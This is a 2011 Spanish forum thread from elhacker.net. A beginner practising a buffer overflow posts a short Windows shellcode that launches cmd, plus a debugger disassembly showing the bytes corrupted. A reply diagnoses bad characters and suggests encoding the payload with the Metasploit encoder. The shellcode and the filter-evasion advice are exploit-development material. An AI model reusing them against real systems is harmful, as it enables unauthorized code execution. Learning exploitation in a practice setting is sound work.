elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Ayuda con shellcode
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda con shellcode  (Leído 2,366 veces)
BrownRabbit

Desconectado Desconectado

Mensajes: 131


xDDDDDDD


Ver Perfil WWW
Ayuda con shellcode
« en: 31 Marzo 2011, 19:49 pm »

saludos

Les comento que recien estoy sumergiendome en el tema de shellcodes y exploits, y tengo el siguiente problema:

Estoy practicando en una aplicacion con un buffer overflow, ya tengo el control del ESP y el el EIP , es decir ya esta listo para ejecutar el shellcode, el que estoy ejecutando es:

Código:
shellcode = ("\x8B\xEC\x33\xFF\x57"
    "\xC6\x45\xFC\x63\xC6\x45"
    "\xFD\x6D\xC6\x45\xFE\x64"
    "\xC6\x45\xF8\x01\x8D"
            "\x45\xFC\x50\xB8\xC7\x93"
            "\xBF\x77\xFF\xD0\x00")"

Sin embargo en el momento de debuggear, sale totalmente modificado el shellcode, he descartado algunas cosas y he visto que  se modifica el los que estan con \xff , bueno en el olly sale asi:

Código:
015DC2E3   8BEC             MOV EBP,ESP
015DC2E5   3357 C6         XOR EDX,DWORD PTR DS:[EDI-3A]
015DC2E8   45                 INC EBP
015DC2E9   DC43 C6       FADD QWORD PTR DS:[EBX-3A]
015DC2EC   45                INC EBP
015DC2ED   FD                STD
015DC2EE   4D                 DEC EBP
015DC2EF   C645 FE 44     MOV BYTE PTR SS:[EBP-2],44
015DC2F3   C645 F8 8D     MOV BYTE PTR SS:[EBP-8],8D
015DC2F7   45                  INC EBP
015DC2F8   DC50 B8         FCOM QWORD PTR DS:[EAX-48]
015DC2FB   C7                  ???                                     
015DC2FC   93                   XCHG EAX,EBX
015DC2FD   BF 57D00000      MOV EDI,0D057
     


Que puede estar pasando,

Gracias por su Respuesta..
En línea

Kz-team
hackspy

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: Ayuda con shellcode
« Respuesta #1 en: 1 Abril 2011, 21:20 pm »

mmm...

por lo que veo, el  FF y el 77 se eliminan, el 6 en las "decenas" se cambia por 4 y mmmm... el 01 lo obvia.... el FC lo cambia por DC


Pero por ejemplo dejó pasar un 00 al final, podría ser que considere algunos de los caracteres como privilegiados, tales como: 90, CC, o 20... podría ser que aquellos caracteres también sean privilegiados para la aplicación que estás ejecutando...

pensaría en usar algo como el msf encoder, especificarle dichos caracteres como prohibidos y que arme una shellcode "cifrada" para ver que pasa...

Ojalá te sea de utilidad.

Sería bueno tener mas info como saber, que aplicación estás probando, o que programa, o que protocolo o librería, como para tener mas información que te ayude.

Salu2.

En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
.:. Shellcode 2 ASM .:. « 1 2 »
ASM
Garfield07 13 10,351 Último mensaje 3 Enero 2011, 20:31 pm
por Garfield07
Vb6 shellcode help ayuda :(
Análisis y Diseño de Malware
Harmmy 9 7,467 Último mensaje 7 Agosto 2012, 18:44 pm
por Harmmy
Ayuda buffer overflo y shellcode
Bugs y Exploits
systemHack 0 3,352 Último mensaje 27 Julio 2013, 02:14 am
por systemHack
Mi primer shellcode en Windows . Ayuda
Bugs y Exploits
Init 2 3,692 Último mensaje 18 Febrero 2018, 02:11 am
por Init
[MSF] Modificar un shellcode
Análisis y Diseño de Malware
4v1dy4 8 7,706 Último mensaje 15 Enero 2023, 00:28 am
por 4v1dy4
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines